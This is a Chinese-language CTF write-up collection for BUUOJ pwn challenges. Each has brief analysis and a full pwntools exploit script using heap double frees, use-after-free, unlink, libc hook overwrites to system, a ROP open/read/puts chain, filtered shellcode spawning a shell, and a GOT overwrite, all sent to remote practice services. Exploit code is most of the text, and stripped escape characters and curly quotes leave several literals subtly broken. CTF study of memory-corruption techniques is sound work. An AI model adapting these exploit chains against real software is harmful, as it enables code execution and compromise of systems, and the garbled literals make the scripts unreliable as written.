此时运用我们的计算机底层的知识,可知,计算机底层储存形式为补码!
-2147483648的补码形式为0x80000000,它取反加一之后仍然是0x80000000,因此这边输入-2147483648
护网杯_2018_gettingstart
此时又要用到我们的数学知识!
转换浮点数工具
# Exploit script for 护网杯 2018 gettingStart (companion to the writeup text
# above). It connects to the practice service and sends one fixed-layout
# line: 0x18 bytes of padding followed by the two 8-byte constants the
# writeup derives (0x3FB999999999999A is the IEEE-754 double encoding of
# 0.1, which is why the author points at a float-conversion tool above).
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './2018_gettingStart'
r = remote('node4.buuoj.cn',29971)
elf = ELF(binary)  # loaded but not referenced anywhere else in this script
payload = b'a'*0x18+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A)
sleep(0.3)
r.sendline(payload)
r.interactive()
ciscn_2019_final_2
分析主要函数!
Allocate申请函数!
Free释放函数!
Show打印函数!
Exit退出函数!
本题涉及IO,故进行细致分析,大致思路为采用UAF漏洞,打印出libc等低地址,进而计算出偏差,重写低地址,修改fd指向stdin+0x70位置,设置为666,进行输入操作!
# Excerpt 1/3 of the ciscn_2019_final_2 script (the helpers Allocate/Free/Show
# are defined in the full script further down the page). Sets up the notes
# and leaks a heap address by calling Show on a note that has just been
# freed — the use-after-free the writeup describes.
Allocate()
Free()
Allocate(2)
Allocate(2)
Allocate(2)
Allocate(2)
Free(2)
Allocate()
Free(2)
heap_low_addr = Show(2)
此时通过连续Free(2)达成tcache的double free,需注意Free之间需要Allocate申请一次,设置bool为1即可释放!
# Excerpt 2/3: fill tcache[0x90] (per the writeup text below), then leak the
# low bytes of a main_arena pointer and derive the stdin-relative address.
# NOTE(review): the curly quotes and the symbol spelled `IO_2_1_stdin` look
# like rendering artifacts; the full script below uses '_IO_2_1_stdin_'.
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(0x91))
for i in range(7):
[Tab] Free(1)# tcache fill
[Tab] Allocate(2)
Free(1)
main_arena_low = Show(1)-96
stdin_low = (main_arena_low-0x10+(libc.symbols[‘IO_2_1_stdin’]-libc.symbols[’__malloc_hook’]))
此时填充tcache[0x90],并泄露出libc上低4位字节,可以计算出_IO_2_1_stdin_与__malloc_hook的偏移量!
# Excerpt 3/3: overwrite the previously leaked libc address with stdin+0x70,
# leak a fresh heap address, then re-lay-out the tcache fd and write 666
# (the value the writeup chooses for _fileno).
Allocate(1,str(stdin_low+0x70))# overwrite the existing low libc address
Allocate()
Free(1)
Allocate(2)
Free(1)
new_heap_addr = Show(1)# leak the low 4 bytes of a heap address
Allocate(1,str(new_heap_addr-0x30))
Allocate(1,str(new_heap_addr-0x30))
Allocate(1)
Allocate(1,str(666))
此时重新对tcache的fd指针进行布局!重写_fileno(_fileno 即文件描述符)
由上一系列的流程进而可以得到flag
# Exploit script for ciscn_2019_final_2 (the three numbered excerpts above
# are slices of this script). Bug class, per the writeup: a use-after-free
# that becomes a tcache double free on glibc 2.27 (libc-2.27.so below).
# Outline from the writeup: leak a heap address and the low bytes of libc,
# compute the offset to _IO_2_1_stdin_, point a tcache fd at stdin+0x70 and
# write 666 into _fileno. Newer glibc hardens exactly these steps: tcache
# double-free detection via the `key` field (2.29) and safe-linking (2.32).
# NOTE(review): backslash escapes look stripped by the page extraction
# ("command?n> ", '1n', recvuntil('n')); compare each literal against the
# original script before treating it as authoritative.
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './ciscn_final_2'
r = remote('node4.buuoj.cn',25631)
#r = process(binary)
elf = ELF(binary)  # loaded but not referenced anywhere else in this script
libc = ELF('./libc-2.27.so')
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
def Allocate(choice=1,payload='1n'):
    """Menu option 1: allocate a note of TYPE `choice` (1 = int, 2 = short int)
    and send `payload` raw (no newline appended) as the inode number."""
    r.sendlineafter("which command?n> ",'1')
    r.sendlineafter("TYPE:n1: intn2: short intn>",str(choice))
    r.sendafter("your inode number:",payload)
def Free(choice=1):
    """Menu option 2: free the note of TYPE `choice`."""
    r.sendlineafter("which command?n> ",'2')
    r.sendlineafter("TYPE:n1: intn2: short intn>",str(choice))
def Show(choice=1):
    """Menu option 3: print the note of TYPE `choice` and return the decimal
    number echoed after "number :", masked to 32 bits for choice 1 and to
    16 bits otherwise."""
    r.sendlineafter("which command?n> ",'3')
    r.sendlineafter("TYPE:n1: intn2: short intn>",str(choice))
    r.recvuntil("number :")
    if choice==1:
        return int(r.recvuntil('n')[:-1],10)&0xffffffff
    else:
        return int(r.recvuntil('n')[:-1],10)&0xffff
def Exit():
    """Menu option 4: exit."""
    r.sendlineafter("which command?n> ",'4')
# Heap leak. The writeup notes that an Allocate between the two Free(2)
# calls is required so the in-use flag is set again before the second free.
Allocate()
Free()
Allocate(2)
Allocate(2)
Allocate(2)
Allocate(2)
Free(2)
Allocate()
Free(2)
heap_low_addr = Show(2)
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(0x91))
# Fill tcache[0x90] so the following Free(1) lands outside tcache
# (presumably the unsorted bin; the writeup only says it leaks the low 4
# bytes of libc). Show(1) then yields a main_arena-relative value; -96 is
# the author's adjustment.
for i in range(7):
    Free(1)#tcache
    Allocate(2)
Free(1)
#gdb.attach(r)
main_arena_low = Show(1)-96
stdin_low = (main_arena_low-0x10+(libc.symbols['_IO_2_1_stdin_']-libc.symbols['__malloc_hook']))
# Overwrite the existing low libc address with stdin+0x70, then leak a fresh
# heap address to prepare the final fd rewrite.
Allocate(1,str(stdin_low+0x70))
Allocate()
Free(1)
Allocate(2)
Free(1)
new_heap_addr = Show(1)
# Re-lay-out the tcache fd and write 666 into _fileno (see writeup text).
Allocate(1,str(new_heap_addr-0x30))
Allocate(1,str(new_heap_addr-0x30))
Allocate(1)
Allocate(1,str(666))
success(hex(new_heap_addr))
success(hex(main_arena_low))
success(hex(stdin_low))
#gdb.attach(r)
Exit()
r.interactive()
[OGeek2019]bookmanager
函数过程较为复杂,其实较为多,不仔细分析了,使用Unlink手法进行攻击__free_hook,经过多次尝试发现__malloc_hook或__realloc_hook无法获取权限,故对__free_hook进行覆写。
本题难度主要是对函数进行分析.攻击手法难度较低!
位于Edit函数存在堆溢出漏洞!
# Exploit script for [OGeek2019]bookmanager. Bug class, per the writeup: a
# heap overflow in Edit, used for a classic unlink that ends in __free_hook
# being overwritten with system; freeing the chapter named '/bin/sh' then
# invokes it. __free_hook (and __malloc_hook) were removed in glibc 2.34, so
# this final step is specific to the bundled libc-2.23.so.
# NOTE(review): backslash escapes look stripped by the page extraction
# ('n', 'abn', b'/bin/shx00', b'x00'); verify every literal against the
# original script.
from unittest.main import main  # stray import: never used below
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './pwn'
#r = process(binary)
r = remote('node4.buuoj.cn',27418)
elf = ELF(binary)  # loaded but not referenced anywhere else in this script
libc = ELF('./libc-2.23.so')
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
def start():
    """Answer the initial "create: " prompt with a book name."""
    r.sendlineafter("create: ",'njh')
def Allocate(chapterName='abn'):
    """Menu option 1: add a chapter called `chapterName`."""
    r.sendlineafter("Your choice:",'1')
    r.sendlineafter("Chapter name:",chapterName)
def AllocateSect(chapterName,sectionName):
    """Menu option 2: add a section to `chapterName`. The service prints a
    0x-prefixed address before asking for the section name; that address is
    parsed and returned."""
    r.sendlineafter("Your choice:",'2')
    r.sendlineafter("add into:",str(chapterName))
    r.recvuntil("0x")
    addr = int(r.recvline()[:-1],16)
    r.sendlineafter("Section name:",str(sectionName))
    return addr
def AllocateText(sectionName,size=0x18,payload='n'):
    """Menu option 3: add `size` bytes of text `payload` to `sectionName`."""
    r.sendlineafter("Your choice:",'3')
    r.sendlineafter("add into:",str(sectionName))
    r.sendlineafter("write:",str(size))
    r.sendlineafter("Text:",payload)
def Free(chapterName):
    """Menu option 4: remove a chapter."""
    r.sendlineafter("Your choice:",'4')
    r.sendlineafter("Chapter name:",str(chapterName))
def FreeSect(sectionName):
    """Menu option 5: remove a section."""
    r.sendlineafter("Your choice:",'5')
    r.sendlineafter("Section name:",str(sectionName))
def FreeText(sectionName):
    """Menu option 6: remove the text of a section."""
    r.sendlineafter("Your choice:",'6')
    r.sendlineafter("Section name:",str(sectionName))
def Book():
    """Menu option 7 (used below to read the book contents back)."""
    r.sendlineafter("Your choice:",'7')
def Edit(choice,new,sectionName=''):
    """Menu option 8: edit a Chapter (choice 1), Section (choice 2) or, for
    any other `choice`, the Text of `sectionName`, replacing it with `new`.
    The writeup locates the heap overflow in this Text path."""
    r.sendlineafter("Your choice:",'8')
    if choice == 1:
        r.sendlineafter("(Chapter/Section/Text):",'Chapter')
        r.sendlineafter("Chapter name:",new)
    elif choice == 2:
        r.sendlineafter("(Chapter/Section/Text):",'Section')
        r.sendlineafter("New Section name:",new)
    else:
        r.sendlineafter("(Chapter/Section/Text):",'Text')
        r.sendlineafter("Section name:",str(sectionName))
        r.sendlineafter("New Text:",new)
sectionaddr = []  # never used
start()
Allocate('/bin/sh')
target = AllocateSect('/bin/sh','1')+0x20  # address printed by the service, +0x20
AllocateSect('/bin/sh','2')
AllocateSect('/bin/sh','3')
# Fake-chunk fd/bk for the unlink: point back at `target` minus 0x18 / 0x10.
fd = target-0x18
bk = target-0x10
AllocateText('1',0x88)
AllocateText('2',0x88)
AllocateText('3')
AllocateText('3')
AllocateText('3',0x18,b'/bin/shx00')
# Overflow from text 1: fake chunk header + fd/bk, then the neighbouring
# size fields (p64(0x80)+p64(0x90)); FreeText('2') triggers the unlink.
Edit(3,p64(0)+p64(0x81)+p64(fd)+p64(bk)+12*p64(0)+p64(0x80)+p64(0x90),'1')
FreeText('2')
AllocateText('2',0x70,b'a'*8)
# Read the book back: the 6 bytes after the 'aaaaaaaa' marker are a
# main_arena pointer (-344 is the author's adjustment).
Book()
r.recvuntil(b'aaaaaaaa')
main_arena = u64(r.recv(6).ljust(8,b'x00'))-344
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']  # computed but unused
one = [0x45206,0x4525a,0xef9f4,0xf0897]  # offsets list, unused below
# Two edits through the now-redirected text pointer: first retarget it at
# __free_hook, then write system there. Free('/bin/sh') fires the hook.
Edit(3,b'a'*0x18+p64(libc_base+libc.symbols['__free_hook']),'1')
Edit(3,p64(libc_base+libc.symbols['system']),'1')
success(hex(target))
success(hex(main_arena))
#gdb.attach(r)
Free('/bin/sh')
r.interactive()
ciscn_2019_final_4
House of Spirit
该ELF存在反调试,故我们利用ida进行patch!
经过分析主要函数!发现仅仅存在UAF漏洞,不存在其它漏洞,没有Edit编辑函数。
发现采用覆写__malloc_hook的方法失效,故此时我们采用覆写到栈地址上,覆写rip!
本题脚本较大(臃肿),但分步来分析的话相对比较简单!
# Excerpt 1/4 of the ciscn_2019_final_4 script (helpers start/Allocate/Free/
# Show are defined in the full script further down the page). Leaks a
# main_arena pointer by calling Show on freed chunk 0 and derives the
# libc-relative addresses used later.
# NOTE(review): curly quotes here are rendering artifacts; see the full
# script for the literal spelling.
start()
Allocate(0x88)#0
Allocate()#1
Free(0)
Show(0)
main_arena = u64(r.recvuntil(’x7f’)[-6:].ljust(8,b’x00’))-88
libc_base = main_arena-0x10-libc.symbols[’__malloc_hook’]
malloc_hook = libc_base+libc.symbols[’__malloc_hook’]
realloc = libc_base+libc.symbols[’__libc_realloc’]
environ_addr = libc_base+libc.symbols[‘environ’]
首先我们通过unsorted bin特性泄露出libc基地址
# Excerpt 2/4: double free (Free(3)/Free(4)/Free(3)) to obtain a chunk over
# the global note table at note_addr-0x70 (writeup), rewrite an entry to
# point at environ, and Show(0) to leak a stack address.
Allocate(0x88)#2 leak libc
Allocate(0x78)#3
Allocate(0x78)#4
Allocate()#5
Allocate(0x88)#6
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(note_addr-0x70))#7
Allocate(0x78)#8
Allocate(0x78)#9
Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10
Show(0)# leak stack
stack_addr = u64(r.recvuntil(b’x7f’)[-6:].ljust(8,b’x00’))-0x210
read_addr = libc_base+libc.symbols[‘read’]
此时我们利用double free漏洞得到bss段上的全局变量的chunk,从而修改全局变量来泄露environ内容得到栈地址!
此时能够泄露出栈地址!
# Excerpt 3/4: the same double-free pattern, this time to obtain a chunk at
# stack_addr and place a read(2) ROP chain there (writeup text below).
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(stack_addr))#11
Allocate(0x78)#12
Allocate(0x78)#13
payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b’n’
Allocate(0x78,payload)#14
此时再次利用double free能够申请得到栈上地址,并写入ROP,此时我们覆写malloc_hook为add rsp;ret即可抬升rsp,并且执行ROP,此时我们能往里面进行写入0x1000大小内容,完成orw!
# Excerpt 4/4: double free in the 0x68 size class to obtain a chunk at
# malloc_hook-0x23 and write the `add rsp` gadget into __malloc_hook; the
# next allocation request (option 1, size 10) pivots into the chain placed
# on the stack, which reads the openat/read/puts chain sent at the end.
Allocate(0x68)#15
Allocate(0x68)#16
Allocate()#17
Free(15)
Free(16)
Free(15)
Allocate(0x68,p64(malloc_hook-0x23))
Allocate(0x68)
Allocate(0x68)
Allocate(0x68,b’a’*0x13+p64(libc_base+add_rsp48))
r.sendlineafter(">> ",‘1’)
r.sendlineafter(“size?”,‘10’)
flag = stack_addr+0xd8
payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols[‘openat’]+libc_base)
payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr)
payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols[‘puts’]+libc_base)+b’/flagx00x00x00’
sleep(0.1)
r.send(payload)
此时我们利用该流程,便可以得到flag!
# Exploit script for ciscn_2019_final_4 (the four excerpts above are slices
# of it). Bug class, per the writeup: use-after-free / double free on glibc
# 2.23 with no edit primitive. Flow: unsorted-bin leak of libc, double free
# to take over the global note table and leak a stack address via environ,
# double free again to place a ROP chain on the stack, then __malloc_hook ->
# `add rsp` gadget to pivot into it and run an openat/read/puts chain.
# glibc 2.34 removed the malloc hooks and 2.32 added safe-linking; the
# technique relies on both being absent.
# NOTE(review): backslash escapes look stripped by the page extraction
# ('x7f', b'x00', 'n', b'/flagx00x00x00'); verify against the original.
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
binary = './ciscn_final_4'
r = remote('node4.buuoj.cn',28544)
#r = process(binary)
elf = ELF(binary)  # loaded but not referenced anywhere else in this script
# The first ELF(...) call is executed (and would raise if the path is
# missing) and then immediately overwritten by the second assignment.
libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
libc = ELF('./libc-2.23.so')
# Gadget offsets relative to the libc base (trailing comments are the
# author's own notes).
pop_rsi_ret = 0x0202e8#0x0202e8
pop_rdi_ret = 0x021102#0x021102
pop_rdx_ret = 0x001b92#0x001b92
add_rsp48 = 0x00c9f81#0x00c9551
note_addr = 0x06020C0  # global note table in the binary (writeup: bss)
def start():
    """Answer the name prompt; the author prefixes a 0x81 size word."""
    r.sendlineafter("what is your name? ",p64(0x81)+b'njh')
def Allocate(size=0x18,payload='n'):
    """Menu option 1: allocate `size` bytes and send `payload` raw as content."""
    r.sendlineafter(">> ",'1')
    r.sendlineafter("size?",str(size))
    r.sendafter("content?",payload)
def Free(index):
    """Menu option 2: free the note at `index`."""
    r.sendlineafter(">> ",'2')
    r.sendlineafter("index ?",str(index))
def Show(index):
    """Menu option 3: print the note at `index` (caller reads the output)."""
    r.sendlineafter(">> ",'3')
    r.sendlineafter("index ?",str(index))
start()
# libc leak through the freed 0x88 chunk (unsorted bin, per the writeup).
Allocate(0x88)#0
Allocate()#1
Free(0)
Show(0)
main_arena = u64(r.recvuntil('x7f')[-6:].ljust(8,b'x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
malloc_hook = libc_base+libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']  # computed but unused
environ_addr = libc_base+libc.symbols['environ']
Allocate(0x88)#2 leak libc
Allocate(0x78)#3
Allocate(0x78)#4
Allocate()#5
Allocate(0x88)#6
# Double free -> chunk over the note table; entry 0 is pointed at environ so
# Show(0) discloses a stack address.
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(note_addr-0x70))#7
Allocate(0x78)#8
Allocate(0x78)#9
Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10
Show(0)# leak stack
stack_addr = u64(r.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))-0x210
read_addr = libc_base+libc.symbols['read']
# Double free again -> chunk at stack_addr, filled with a read(2) chain.
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(stack_addr))#11
Allocate(0x78)#12
Allocate(0x78)#13
payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b'n'
Allocate(0x78,payload)#14
# Double free in the 0x68 class -> chunk at malloc_hook-0x23; the hook is
# set to the add-rsp gadget so the next malloc pivots into the chain above.
Allocate(0x68)#15
Allocate(0x68)#16
Allocate()#17
Free(15)
Free(16)
Free(15)
Allocate(0x68,p64(malloc_hook-0x23))
Allocate(0x68)
Allocate(0x68)
Allocate(0x68,b'a'*0x13+p64(libc_base+add_rsp48))
success(hex(note_addr))
success(hex(main_arena))
success(hex(environ_addr))
success(hex(stack_addr))
#gdb.attach(r,'b *0x0000000000400B2C')
# Trigger malloc (option 1) and then feed the openat/read/puts chain to the
# pending read(2); `flag` is where the "/flag" path string ends up.
r.sendlineafter(">> ",'1')
r.sendlineafter("size?",'10')
flag = stack_addr+0xd8
payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols['openat']+libc_base)
payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr)
payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols['puts']+libc_base)+b'/flagx00x00x00'
sleep(0.1)
r.send(payload)
r.interactive()
starctf_2019_babyshell
逻辑比较简单!
check函数检测shellcode是否匹配data段上的一串数据,如下
此时我们只要输入的shellcode从其中选择即可!
此时我们选择调整rdi与rdx的值,并且调用syscall进行sys_read,并输入sh执行函数!
或者我们可以利用x00跳出循环比较,从而执行sh函数!如’x00J’+’x00’ 或 ‘x00B3’
# Exploit script for starctf_2019_babyshell. The service executes submitted
# shellcode after checking its bytes against a table in .data (writeup).
# Stage 1 is assembled only from instructions that pass that check and ends
# in a syscall (intended as a read, per the writeup); stage 2 is the real
# shellcode, sent after 0xc bytes of padding. The root issue is an input
# buffer that is both writable and executable — NX / W^X is the mitigation.
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './starctf_2019_babyshell'
r = remote('node4.buuoj.cn',27400)
#r = process(binary)
elf = ELF(binary)  # loaded but not referenced anywhere else in this script
#gdb.attach(r,'b *0x004008C6')
r.recvuntil("give me shellcode, plz:")
payload = asm('pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdi;syscall')
r.send(payload)
sleep(0.1)
r.send(b'a'*0xc+asm(shellcraft.sh()))
r.interactive()
wustctf2020_easyfast
简单的double
简单的UAF堆题目!
# Exploit script for wustctf2020_easyfast. Bug class, per the writeup: a
# use-after-free — Edit still works on a freed chunk, so chunk 0's fd is
# rewritten to shell_addr-0x10, allocation #3 is served from there, and
# Edit(3, p64(0)) zeroes the value at shell_addr before option 4 (Shell) is
# chosen. glibc 2.32's safe-linking mangles freed fd pointers, so a raw
# pointer written this way no longer dereferences cleanly.
# NOTE(review): backslash escapes look stripped by the page extraction
# ("choice>n", 'n'); verify the literals against the original script.
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './wustctf2020_easyfast'
r = remote('node4.buuoj.cn',26675)
#r = process(binary)
elf = ELF(binary)  # loaded but not referenced anywhere else in this script
libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')  # unused
shell_addr = 0x0602090
def Allocate(size=0x18):
    """Menu option 1: allocate `size` bytes."""
    r.sendlineafter("choice>n",'1')
    r.sendlineafter("size>n",str(size))
def Free(index):
    """Menu option 2: free the chunk at `index`."""
    r.sendlineafter("choice>n",'2')
    r.sendlineafter("index>n",str(index))
def Edit(index,payload='n'):
    """Menu option 3: write `payload` raw into the chunk at `index`
    (no check that the chunk is still allocated — the UAF)."""
    r.sendlineafter("choice>n",'3')
    r.sendlineafter("index>n",str(index))
    r.send(payload)
def Shell():
    """Menu option 4."""
    r.sendlineafter("choice>n",'4')
Allocate(0x48)#0
Allocate(0x48)#1
Free(0)
Edit(0,p64(shell_addr-0x10))  # freed chunk's fd -> shell_addr-0x10
Allocate(0x48)#2
Allocate(0x48)#3
Edit(3,p64(0))  # #3 overlaps shell_addr; clear the value there
success(hex(shell_addr))
#gdb.attach(r)
Shell()
r.interactive()
wustctf2020_name_your_dog
存在局限的任意地址写漏洞,较为简单!
经过计算可以修改scanf@got为后门函数地址!
# Exploit script for wustctf2020_name_your_dog. Bug class, per the writeup: an
# unchecked (here negative) index gives a limited arbitrary write; index -7
# is said to reach scanf@got, which is overwritten with the backdoor
# address. A fully RELRO'd (read-only) GOT is what prevents this class of
# overwrite.
# NOTE(review): "which?n>" presumably had a backslash stripped by the page
# extraction; verify against the original script.
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
binary = './wustctf2020_name_your_dog'
r = remote('node4.buuoj.cn',27072)
#r = process(binary)
elf = ELF(binary)  # loaded but not referenced anywhere else in this script
shell_addr = 0x080485CB
dogs = 0x0804A060  # array base recorded by the author; not used below
def nameWhich(offset,payload):
    """Pick entry `offset` at the "Name for which?" prompt and send `payload`
    as its name."""
    r.sendlineafter("Name for which?n>",str(offset))
    r.sendlineafter("Give your name plz: ",payload)
# NOTE(review): the addresses are 32-bit (0x0804...) while context is amd64
# and p64 packs 8 bytes; presumably the extra zero bytes are harmless here —
# confirm against the original.
nameWhich('-7',p64(shell_addr))
r.interactive()
ciscn_2019_en_3
该文件出现了FORTIFY保护!
本题较为简单,2.27的double free,本意想要采用house of spirit!但是经过实践该方法复杂且无法绕过canary。故还是老老实实采用double free最简单的方式来获取权限!
# Exploit script for ciscn_2019_en_3. Two weaknesses are used, per the
# writeup and the code: a format string in the name prompt (read-only use
# via %p — the FORTIFY protection noted above rejects %n-style writes, which
# this leak does not need) and a tcache double free on glibc 2.27 that ends
# with __free_hook overwritten by system. glibc 2.29+ detects this double
# free (tcache `key`) and 2.34 removed __free_hook entirely.
# NOTE(review): backslash escapes look stripped by the page extraction
# ('n', b'/bin/shx00'); verify every literal against the original script.
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
binary = './ciscn_2019_en_3'
r = remote('node4.buuoj.cn',26765)
#r = process(binary)
elf = ELF(binary)  # loaded but not referenced anywhere else in this script
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
libc = ELF('./libc-2.27.so')
def Allocate(size=0x18,payload='n'):
    """Menu option 1: allocate a story of `size` bytes and send `payload` raw."""
    r.sendlineafter("Input your choice:",'1')
    r.sendlineafter("story: ",str(size))
    r.sendafter("story: ",payload)
def Free(index):
    """Menu option 4: free the story at `index`."""
    r.sendlineafter("Input your choice:",'4')
    r.sendlineafter("Please input the index:",str(index))
#gdb.attach(r)
# Format-string leak: the name is echoed through printf, so the %p sequence
# discloses pointers. The first value read after ".0x" is a libc address
# (_IO_file_jumps-relative), the second a stack address (-0x138 per author).
r.sendlineafter("What's your name?",'%p%p%p%p.%p,%p%p%p%p%p%p%p.%p,')
r.recvuntil(".0x")
libc_base = int(r.recv(12),16)-libc.symbols['_IO_file_jumps']
r.recvuntil(".0x")
stack_addr = int(r.recv(12),16)-0x138
free_hook = libc_base+libc.symbols['__free_hook']
system = libc_base+libc.symbols['system']
success("stack_addr -> "+hex(stack_addr))
success("libc_base -> "+hex(libc_base))
r.sendafter("Please input your ID.",p64(0x71))  # purpose not stated in the writeup
# tcache double free: Free(0) twice, then the third allocation is served
# from __free_hook and receives the address of system.
Allocate()#0
Allocate(0x18,b'/bin/shx00')#1
Free(0)
Free(0)
Allocate(0x18,p64(free_hook))
Allocate()#2
Allocate(0x18,p64(system))
success(hex(free_hook))
#gdb.attach(r)
Free(1)  # free(ptr_to "/bin/sh") now goes through the hook
r.interactive()